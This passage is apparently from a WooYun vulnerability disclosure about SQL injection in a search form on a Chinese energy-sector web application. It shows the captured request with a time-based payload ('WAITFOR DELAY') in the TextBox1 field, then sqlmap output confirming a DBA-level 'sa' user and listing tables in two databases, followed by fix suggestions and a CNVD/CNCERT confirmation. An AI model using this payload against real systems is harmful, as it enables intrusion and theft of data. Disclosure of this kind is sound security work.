Lj+W3njvlpJbluII75paw55aGO+S4reW/gzs+PjtsPGk8Mz47Pj47Oz47dDx0PDt0PGk8MTQ+O0A8bjv
mtYvor5UyO+W4uOeGnzvpq5jmlrDljLo75bel5Lia5Zut5Yy6O+WnkeiLj+WMujvmmIblsbE76IuP5be
eO+iLj+W3nuWTjeW6lDvlpKrku5M75ZC05rGfO+WQtOS4reWMujvnm7jln47ljLo75byg5a625rivOz4
7QDxuO+a1i+ivlTI75bi454afO+mrmOaWsOWMujvlt6XkuJrlm63ljLo75aeR6IuP5Yy6O+aYhuWxsTv
oi4/lt5476IuP5bee5ZON5bqUO+WkquS7kzvlkLTmsZ875ZC05Lit5Yy6O+ebuOWfjuWMujvlvKDlrrb
muK87Pj47bDxpPDEzPjs+Pjs7Pjt0PHQ8O3Q8aTwxPjtAPG47PjtAPG47Pj47Pjs7Pjt0PEAwPHA8cDx
sPEl0ZW1Db3VudDs+O2w8aTwtMT47Pj47PjtAMDxwPGw8c2VyQWN0aXZlQ2VsbFN0cmluZztzZXJBY3R
pdmVSb3dTdHJpbmc7PjtsPDs7Pj47Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7O0AwPDtsPEAwPHA8bDxLZXk7QmF
zZVRhYmxlTmFtZTtBZGRCdXR0b25DYXB0aW9uOz47bDxcZTtcZTtcZTs+Pjs7Ozs7Ozs7Ozs7OztAMDx
sPFN5c3RlbS5VSW50NjQsIG1zY29ybGliLCBWZXJzaW9uPTEuMC41MDAwLjAsIEN1bHR1cmU9bmV1dHJ
hbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OTw0Mjk0OTY3Mjk1Pjs1MDwxPjs1MDwyPjs
1MDwzPjs1MDw0Pjs1MDw1Pjs1MDw2Pjs1MDw4NTg5OTM0NTkyPjs1MDw0Mjk0OTY3Mjk2Pjs1MDw2Pjs
+O2w8QDA8cDxsPEJhc2VDb2x1bW5OYW1lO0tleTtJc0JvdW5kOz47bDzkuIDnuqfljLrln5875LiA57q
n5Yy65Z+fO288dD47Pj47Ozs7OztAMDxwPGw8Q2FwdGlvbjs+O2w85LiA57qn5Yy65Z+fOz4+Ozs7Pjs
7PjtAMDxwPGw8QmFzZUNvbHVtbk5hbWU7S2V5O0lzQm91bmQ7PjtsPOS6jOe6p+WMuuWfnzvkuoznuqf
ljLrln587bzx0Pjs+Pjs7Ozs7O0AwPHA8bDxDYXB0aW9uOz47bDzkuoznuqfljLrln587Pj47Ozs+Ozs
+O0AwPHA8bDxCYXNlQ29sdW1uTmFtZTtLZXk7SXNCb3VuZDs+O2w85LiJ57qn5Yy65Z+fO+S4iee6p+W
MuuWfnztvPHQ+Oz4+Ozs7Ozs7QDA8cDxsPENhcHRpb247PjtsPOS4iee6p+WMuuWfnzs+Pjs7Oz47Oz4
7QDA8cDxsPEJhc2VDb2x1bW5OYW1lO0tleTtJc0JvdW5kO1dpZHRoOz47bDzkvIHkuJrnvJbnoIE75Ly
B5Lia57yW56CBO288dD47MTwzMjBweD47Pj47Ozs7OztAMDxwPGw8Q2FwdGlvbjs+O2w85LyB5Lia57y
W56CBOz4+Ozs7Pjs7PjtAMDxwPGw8QmFzZUNvbHVtbk5hbWU7S2V5O0lzQm91bmQ7V2lkdGg7PjtsPOS
8geS4muWQjeensDvkvIHkuJrlkI3np7A7bzx0PjsxPDMyMHB4Pjs+Pjs7Ozs7O0AwPHA8bDxDYXB0aW9
uOz47bDzkvIHkuJrlkI3np7A7Pj47Ozs+Ozs+O0AwPHA8bDxEYXRhVHlwZTtCYXNlQ29sdW1uTmFtZTt
LZXk7SXNCb3VuZDs+O2w8U3lzdGVtLkludDY0O+WPl+eUteWuuemHjzvlj5fnlLXlrrnph487bzx0Pjs
+Pjs7Ozs7O0AwPHA8bDxDYXB0aW9uOz47bDzlj5fnlLXlrrnph487Pj47Ozs+Ozs+O0AwPHA8bDxLZXk
7TnVsbFRleHQ7V2lkdGg7Q29sdW1uVHlwZTs+O2w8dGVzdDvnlLXog73mnI3liqE7MTwxMjBweD47SW5
mcmFnaXN0aWNzLldlYlVJLlVsdHJhV2ViR3JpZC5Db2x1bW5UeXBlLCBJbmZyYWdpc3RpY3MuV2ViVUk
uVWx0cmFXZWJHcmlkLnY0LjMsIFZlcnNpb249NC4zLjIwMDQzLjI3LCBDdWx0dXJlPW5ldXRyYWwsIFB
1YmxpY0tleVRva2VuPTdkZDVjMzE2M2YyY2QwY2I8QnV0dG9uPjs+PjtwPGw8QmFja0NvbG9yO0JvcmR
lclN0eWxlO0E7QjtGb3JlQ29sb3I7Rm9udF9TaXplO18hU0I7PjtsPDI8MjIwLCAyMjAsIDIyMD47U3l
zdGVtLldlYi5VSS5XZWJDb250cm9scy5Cb3JkZXJTdHlsZSwgU3lzdGVtLldlYiwgVmVyc2lvbj0xLjA
uNTAwMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2E8Tm9
uZT47XGU7QkFDS0dST1VORC1QT1NJVElPTjogY2VudGVyIGNlbnRlclw7QmFja2dyb3VuZC1yZXBlYXQ
6bm8tcmVwZWF0OzI8Qmx1ZT47U3lzdGVtLldlYi5VSS5XZWJDb250cm9scy5Gb250VW5pdCwgU3lzdGV
tLldlYiwgVmVyc2lvbj0xLjAuNTAwMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI
wM2Y1ZjdmMTFkNTBhM2E8OXB0PjtpPDExMDA+Oz4+O3A8bDxIb3Jpem9udGFsQWxpZ247QTtCO0ZvcmV
Db2xvcjtfIVNCOz47bDxTeXN0ZW0uV2ViLlVJLldlYkNvbnRyb2xzLkhvcml6b250YWxBbGlnbiwgU3l
zdGVtLldlYiwgVmVyc2lvbj0xLjAuNTAwMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2V
uPWIwM2Y1ZjdmMTFkNTBhM2E8Q2VudGVyPjtcZTtCQUNLR1JPVU5ELVBPU0lUSU9OOiBjZW50ZXIgY2V
udGVyXDtCYWNrZ3JvdW5kLXJlcGVhdDpuby1yZXBlYXQ7MjxCbHVlPjtpPDQ+Oz4+Ozs7O0AwPHA8bDx
DYXB0aW9uOz47bDxcZTs+Pjs7Oz47Oz47Pjs+Ozs7Pjs+Oz47Ozs7Oz47Pjs7Pjs+Pjs+PjtsPEltYWd
lQnV0dG9uMTtVbHRyYVdlYkdyaWQxOz4+uUb0LvrCN4cUV+KhXy6k/koWSoo=&DropDownList2=%E8%
8B%8F%E5%B7%9E&DropDownList3=%E5%BC%A0%E5%AE%B6%E6%B8%AF&DropDownList4=n&TextBox
1=333' WAITFOR DELAY '0:0:5'--&UltraWebGrid1=%3CDisplayLayout%3E%3CStateChanges%
3E%3C/StateChanges%3E%3C/DisplayLayout%3E&ImageButton1.x=67&ImageButton1.y=13
---
[10:51:01] [INFO] testing Microsoft SQL Server
[10:51:01] [INFO] confirming Microsoft SQL Server
[10:51:01] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2008
[10:51:01] [INFO] fetching current user
[10:51:01] [WARNING] reflective value(s) found and filtering out
current user:    'sa'
[10:51:01] [INFO] fetching current database
current database:    'PowerV3'
[10:51:01] [INFO] testing if current user is DBA
current user is DBA:    True


4.jpg


Database: Collect_SH
+--------------------+---------+
| Table              | Entries |
+--------------------+---------+
| dbo.Data           | 138     |
| dbo.ItemList       | 48      |
| dbo.GroupRight     | 22      |
| dbo.PictureList    | 16      |
| dbo.ModelParameter | 14      |
| dbo.FunList        | 10      |
| dbo.Menu           | 9       |
| dbo.Users          | 9       |
| dbo.v_Users        | 9       |
| dbo.Customer       | 3       |
| dbo.HealthReminder | 3       |
| dbo.UserGroups     | 3       |
+--------------------+---------+


Database: power_wujiang
+--------------------+---------+
| Table              | Entries |
+--------------------+---------+
| dbo.Data           | 152     |
| dbo.ItemList       | 49      |
| dbo.Map            | 29      |
| dbo.GroupRight     | 22      |
| dbo.FunList        | 16      |
| dbo.Menu           | 15      |
| dbo.ModelParameter | 14      |
| dbo.Users          | 9       |
| dbo.v_Users        | 9       |
| dbo.Customer       | 3       |
| dbo.HealthReminder | 3       |
| dbo.UserGroups     | 3       |
| dbo.PictureList    | 2       |
+--------------------+---------+


这两个库里面的用户名的密码也都是明文的,就不贴出来了!~~~
其余的地方就不测试了,因为怕改变收据,就这样吧,主要这个搜索地方的问题!~~~

漏洞证明:

3.jpg

修复方案:

过滤修复
密码加强
权限限制

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-10-12 08:29

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向能源行业信息化主管部门通报,由其后续协调网站管理单位处置.

最新状态:

暂无